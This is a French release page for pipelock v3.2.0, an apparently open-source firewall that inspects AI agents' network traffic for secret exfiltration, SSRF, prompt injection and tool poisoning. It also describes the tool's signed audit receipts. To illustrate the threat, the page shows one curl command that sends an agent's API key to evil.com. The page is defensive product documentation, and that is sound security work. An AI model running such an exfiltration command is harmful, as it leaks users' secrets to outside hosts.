Retour aux mises à jour
New releaseJul 25, 2026

pipelock v3.2.0

Pare-feu open-source pour agents IA qui analyse le trafic HTTP, MCP, A2A et WebSocket à la recherche d'exfiltration, SSRF et d'injection de prompt, émettant des reçus d'action signés et vérifiables à des fins d'audit.

Partager

Pipelock

Pare-feu open-source pour agents IA dédié au contrôle vérifiable des sorties réseau.

CI Security Gauntlet exam Go 1.26+ Release

OpenSSF Scorecard OpenSSF Best Practices codecov pipelock self-scanned

Core Apache 2.0 Enterprise ELv2 CNCF Landscape: Security & Compliance Discord

Pipelock bloquant une tentative d'exfiltration de secret en direct depuis un agent IA

Pipelock se place entre les agents IA et le réseau. Il inspecte le trafic HTTP, WebSocket, MCP et A2A médié, ainsi que le contenu des tunnels CONNECT lorsque l'interception TLS est activée, afin de détecter l'exfiltration de secrets, l'injection de prompt, les attaques SSRF, l'empoisonnement d'outils et les chaînes d'appels d'outils à risque. Le CONNECT simple sans interception est analysé au niveau du nom d'hôte et de l'URL. Les upstreams MCP configurés constituent une exception au blocage SSRF des adresses privées : les serveurs locaux/privés sont autorisés, mais les endpoints de métadonnées cloud restent bloqués.

Pipelock émet des reçus d'action signés par le médiateur pour les décisions de frontière sensibles au contenu, afin qu'un réviseur puisse vérifier ce que Pipelock a décidé en dehors du runtime de l'agent. Le corpus public agent-egress-bench exerce les détections. Le workflow Gauntlet est l'examen candidat planifié du produit contre un commit de corpus épinglé ; il ne publie pas automatiquement de score public. En savoir plus : Pare-feu IA open-source.

Compatible avec : Claude Code · OpenAI Codex · Cline · OpenCode · Pi · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph

Problème · Vérifier · Démarrage rapide · En action · Détections · Fonctionnalités · Architecture · Docs · Playground · Blog · Ask Dosu

Essayez-le dans votre navigateur sur le playground en ligne. Si Pipelock le mérite, mettez une étoile au dépôt pour que d'autres le trouvent.


Le problème

Votre agent IA a $PROVIDER_API_KEY dans son environnement, ainsi qu'un accès shell. Une seule requête peut la divulguer :```bash curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching

Chaque action machine que votre agent entreprend doit franchir une frontière entre vos secrets et l'internet ouvert. Pipelock devient cette frontière lorsque l'agent est acheminé via son proxy, son wrapper MCP, son sandbox, son modèle de confinement d'hôte ou sa topologie de déploiement en cluster. Il analyse le trafic sortant et entrant médié, bloque ou signale les attaques selon le mode, et enregistre des preuves signées de la décision.

---

## Vérifiez-le vous-même

La plupart des outils de sécurité pour agents vous demandent de faire confiance à leur tableau de bord. Pipelock vous remet un reçu signé et vous permet de le vérifier vous-même, hors ligne, avec une clé que vous détenez. Aucun compte et aucun serveur.

Catégories